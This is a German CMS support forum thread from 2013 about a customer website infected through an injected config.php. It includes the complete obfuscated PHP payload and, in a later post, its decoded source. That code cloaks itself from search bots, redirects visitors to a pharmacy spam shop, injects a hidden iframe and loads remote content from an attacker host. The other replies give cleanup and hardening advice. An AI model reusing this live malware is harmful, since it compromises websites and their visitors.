Hiiiiiiilfe !!!! Riesiges Problem auf Kundenseite

Gesperrt
apicalart
Beiträge: 161
Registriert: Fr 18. Mär 2005, 13:09
Wohnort: Linnich ( NRW )
Kontaktdaten:

Hiiiiiiilfe !!!! Riesiges Problem auf Kundenseite

Beitrag von apicalart » Fr 20. Sep 2013, 08:50

Guten Morgen,

ich habe seit einer Woche ein Problem auf einer Kundenseite.

Es erscheinen permanent Felermeldungen der Art:

Code: Alles auswählen

Warning: Cannot modify header information - headers already sent by (output started at /var/httpd/.../contenido/includes/config.php:10) in /var/httpd/www.schoellershammer.de/conlib/session.inc on line 508

Warning: Cannot modify header information - headers already sent by (output started at /var/httpd/.../contenido/includes/config.php:10) in /var/httpd/www.schoellershammer.de/conlib/session.inc on line 513

Warning: Cannot modify header information - headers already sent by (output started at /var/httpd/.../contenido/includes/config.php:10) in /var/httpd/www.schoellershammer.de/conlib/session.inc on line 514

Warning: Cannot modify header information - headers already sent by (output started at /var/httpd/.../contenido/includes/config.php:10) in /var/httpd/www.schoellershammer.de/conlib/session.inc on line 515

Warning: Cannot modify header information - headers already sent by (output started at /var/httpd/.../contenido/includes/config.php:10) in /var/httpd/www.schoellershammer.de/conlib/session.inc on line 516


Warning: Cannot modify header information - headers already sent by (output started at /var/httpd/.../contenido/includes/config.php:10) in /var/httpd/www.schoellershammer.de/cms/front_content.php on line 202
Ich habe jetzt jeden Tag die config.php ausgetauscht und Setup laufen lassen. Dann ist alles wieder ganz, aber am nächsten Morgen wieder alles da.

Ich habe die config.php gescheckt. Da steht plötzlich oben vor dem Beginn der ursprünglichen Datei.

Code: Alles auswählen

<?php eval(gzinflate(base64_decode('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')));?>
Was kann ich tun. Der Kunde wird nervös.
Dat gijjt et doch nit wirklich, odder !

Grüsse aus dem Rheinland
http://www.eukoba.de

apicalart
Beiträge: 161
Registriert: Fr 18. Mär 2005, 13:09
Wohnort: Linnich ( NRW )
Kontaktdaten:

Re: Hiiiiiiilfe !!!! Riesiges Problem auf Kundenseite

Beitrag von apicalart » Fr 20. Sep 2013, 08:52

Zur Ergänzung: Es ist 4.8.18 installiert.


In der contenido/includes/config.php steht der ergänzte Eintrag auch drin.
Dat gijjt et doch nit wirklich, odder !

Grüsse aus dem Rheinland
http://www.eukoba.de

Faar
Beiträge: 1915
Registriert: Sa 8. Sep 2007, 16:23
Wohnort: Brandenburg
Kontaktdaten:

Re: Hiiiiiiilfe !!!! Riesiges Problem auf Kundenseite

Beitrag von Faar » Fr 20. Sep 2013, 09:32

Schnell die Seite vom Netz nehmen!

Das sind Trojaner-Codes:

Code: Alles auswählen

eval(gzinflate(base64_decode('
Danach muss der Server, bzw. der Webspace Virenfrei gemacht werden und die Lücken geschlossen werden.
Fliegt der Bauer übers Dach, ist der Wind weißgott nicht schwach.

Faar
Beiträge: 1915
Registriert: Sa 8. Sep 2007, 16:23
Wohnort: Brandenburg
Kontaktdaten:

Re: Hiiiiiiilfe !!!! Riesiges Problem auf Kundenseite

Beitrag von Faar » Fr 20. Sep 2013, 09:37

Das ist der Code, der da drin steht:

Code: Alles auswählen

if (!defined('frmDs')){	define('frmDs' ,1);	error_reporting(0);		function frm_dl ($url) {		if (function_exists('curl_init')) {			$ch = curl_init($url);			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);			$out = curl_exec ($ch);			if (curl_errno($ch) !== 0) $out = false;			curl_close ($ch);		} else {$out = @file_get_contents($url);}		return trim($out);	}		function frm_crpt($in){		$il=strlen($in);$o='';		for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';		return $o;	}		function frm_getcache($tmpdir,$link,$cmtime,$del=true){		$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));		if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime)		{			$dlc=frm_dl($link);			if($dlc===false){				if(del)					@unlink($f);				else					@touch($f);			}			else 			{				if($fp = @fopen($f,'w')){					fwrite($fp, frm_crpt($dlc)); fclose($fp);				}else{return $dlc;}			}		}		$fc = @file_get_contents($f);		return ($fc)?frm_crpt($fc):'';	}		function frm_isbot(){		$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);		if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 		$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),					array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),					array(3481178113,3481182206),array(2915172353,2915237886));		foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;		if(!$ua)return true;		$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');		foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;		$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);		$hba=array('google','msn','yahoo');		if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;		return false;	}		function frm_tmpdir(){		$fs = array('/tmp','/var/tmp');        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {            if ($t = getenv($v)) {$fs[]=$t;}        }        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}        $fs[]='.';		        foreach ($fs as $f){        	$tf = $f.'/'.md5(rand());        	if($fp = @fopen($tf, 'w')){        		fclose($fp);        		unlink($tf);        		return $f;        	}        }		return false;	}	function frm_seref(){		$r = @strtolower($_SERVER["HTTP_REFERER"]);		$ses = array('google','bing','yahoo','ask','aol');		foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;		return false;	}		function frm_isuniq($tdir){		$ip=$_SERVER['REMOTE_ADDR'];		$dbf=$tdir.'/sess_'.md5(date('m.d.y'));		$odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400));		if (file_exists($odbf)) @unlink($odbf);		if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){			if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);}			return true;		}		return false;	}			function frm_havekey(){		$nks = array('cialis','cipro','clomi','diflucan','finasteride','fluconazole','furosemide','kamagra','lasix','levitra','propecia','sildenafil','tadalafil','vardenafil','viagra','zithrom','priligy','amoxil');		$k = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]);		print_r($r);		if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return false;		foreach ($nks as $n)if(strpos($k, $n)!==false) return $n;		return false;	}		$tdir = frm_tmpdir();	$defframe = '<style>	.avqcds { position:absolute; left:-1182px; top:-816px; }</style><div class="avqcds"><iframe src="http://ccztlodygknm.lookin.at/jquery/get.php?ver=jquery.latest.js" width="304" height="491"></iframe></div>';	$codelink = 'http://ccztlodygknm.lookin.at/nc/gnc.php?ver=jquery.latest.js';		$ua=$_SERVER['HTTP_USER_AGENT'];	$isb=frm_isbot();	$k=frm_havekey();	//-------	$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));	if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|[a-z0-9\-]+\.edu)$/', $host)){		$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p')))),0,3);		$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;		$ruri = strtolower($_SERVER['REQUEST_URI']);		if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){			if(!$isb && frm_seref()){				header('Location: http://pharmshopping.net'.($k?('/search.html?key='.$k.'&'):'/?').'rdh='.$host.'&rpn='.$pageid);				exit();			}			print(frm_getcache($tdir,"http://ccztlodygknm.lookin.at/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*24,false));			exit();		}		if (($ruri=='/' || $ruri=='/index.php') && $isb) {			print(frm_getcache($tdir,"http://ccztlodygknm.lookin.at/rdg/getpage.php?h=$host&pa=$parg&g=1",60*24,false));			exit();		}	}	//---------		if(!$isb&&frm_seref()&&$k){		header('Location: http://pharmshopping.net/search.html?key='.$k.'&rdh=na');exit();	}		if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){		if(!isset($_COOKIE['__utmfr'])) {			if(!$codelink)				print($defframe);			else				print(frm_getcache($tdir,$codelink,15));			@setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');		}	}}
Nicht gut, da ist noch ein Trojaner auf dem Server, oder mehrere, die das System sofort wieder damit infizieren, sobald diese Datei hier überschrieben wurde.
Also, eigenen PC untersuchen und auch den Server/Webspace.
Fliegt der Bauer übers Dach, ist der Wind weißgott nicht schwach.

Spider IT
Beiträge: 1416
Registriert: Fr 3. Dez 2004, 10:15

Re: Hiiiiiiilfe !!!! Riesiges Problem auf Kundenseite

Beitrag von Spider IT » Fr 20. Sep 2013, 09:52

Ganz wichtig als Ergänzung: sofort sämtliche FTP-Zugänge ändern, denn es kann ein Trojaner auf dem PC die gespeicherten FTP-Daten ausspioniert haben.
Das kann auch auf dem PC des Kunden sein, also auch alle dort gespeicherten Zugänge ändern und dessen PC(s) säubern.

Gruß
René

apicalart
Beiträge: 161
Registriert: Fr 18. Mär 2005, 13:09
Wohnort: Linnich ( NRW )
Kontaktdaten:

Re: Hiiiiiiilfe !!!! Riesiges Problem auf Kundenseite

Beitrag von apicalart » Fr 20. Sep 2013, 09:56

Danke Faar und Rene.

D.h. aber, dass es nicht an contenido liegt, sondern wohl eher beim Provider zu suchen ist. Sehe ich das richtig?
Dat gijjt et doch nit wirklich, odder !

Grüsse aus dem Rheinland
http://www.eukoba.de

Faar
Beiträge: 1915
Registriert: Sa 8. Sep 2007, 16:23
Wohnort: Brandenburg
Kontaktdaten:

Re: Hiiiiiiilfe !!!! Riesiges Problem auf Kundenseite

Beitrag von Faar » Fr 20. Sep 2013, 10:24

Nein, so pauschal kann man das nicht sagen.

Der Trojaner kann schon vor einem Update eingedrungen sein oder wie Rene sagt, vom Computer aus infiziert worden sein.
Besonders Kunden die Apple-Computer benützen, haben oft keinen Virenscanner, weil sie der Meinung sind, dass Apple Computer nicht von Viren befallen werden würden und das nur ein Problem der Windows-Computer sei.
Das ist ein fataler Irrtum, denn gerade dieser Art Virus bekam ich selbst mal per Mail durch einen Apple-Besitzer-Kunden zugeschickt, aber mein Viruschecker hat gleich die Email blockiert und den Virus unschädlich gemacht.
Leider merkte der Kunde gar nicht, dass seine Macs alle Virenschleudern waren und er auch seine Webseite damit infizierte.
Und wie Rene eben anmerkte, sobald ein Trojaner auf dem PC auch FTP-Daten ausspähen könnte, hat der Hacker auch die Zugangsdaten und kommt immer wieder rein, bis dass alle (!) Daten geändert wurden, also auch Contenido Zugänge und Datenbank-Passwörter usw. (Hoster-zugang nicht vergessen).

Man merkt es z.B., wenn man den Webspace und Contenido immer wieder ganz sicher viren- und trojanerfrei macht und alles wieder neu infiziert wird.

Aber es könnte auch eines der gängigen Module oder Plugins sein, das vielleicht nicht sicher programmiert wurde.
Manchmal geben die Logfiles auskunft darüber, ob von außen her eine Programmdatei direkt angesprochen wurde.
Es gibt ja immer noch Programmcodes, die nehmen direkt $_REQUEST['irgendwas'] in die Datenbank Abfrage rein...
Leichter kommt man nicht mit SQL-Injection rein.

Prinzipiell würde ich dazu raten, Contenido so zu installieren, wenn es vom Hoster aus geht:

1. Domain direkt auf den Mandanten aufschalten.
http://www.domain.tld/ ---> /cms

2. Eine kryptische Subdomain einrichten und diese auf Contenido aufschalten, für den Backend Login.
http://xk40bse3po.domain.tld/ ---> /contenido

Dann haben es Hacker zumindest schwerer, an das System zu kommen und das Backend mit Brute Force zu bombardieren, wenn sie die Subdomain nicht kennen.
Dazu sollte man in einer Config-Datei im Contenido/Includes Verzeichnis noch die Passwort-Stärke einstellen, denn es gibt viele Kunden, die ihren Namen oder drei Buchstaben nehmen und noch eine Zahl dazu, als Passwort :shock: .
Da kann man die Länger auf 12 Zeichen einstellen und Sonderzeichen, Groß- und Kleinschrift und Zahlen.
Dann muss man bei einem neuen Passwort ein sicheres nehmen, weil nichts anderes mehr zugelassen wird.

Der Hoster hat meistens wenig damit zu tun, kommt zwar auch vor, ist aber meistens nicht der Fall.
Fliegt der Bauer übers Dach, ist der Wind weißgott nicht schwach.

Gesperrt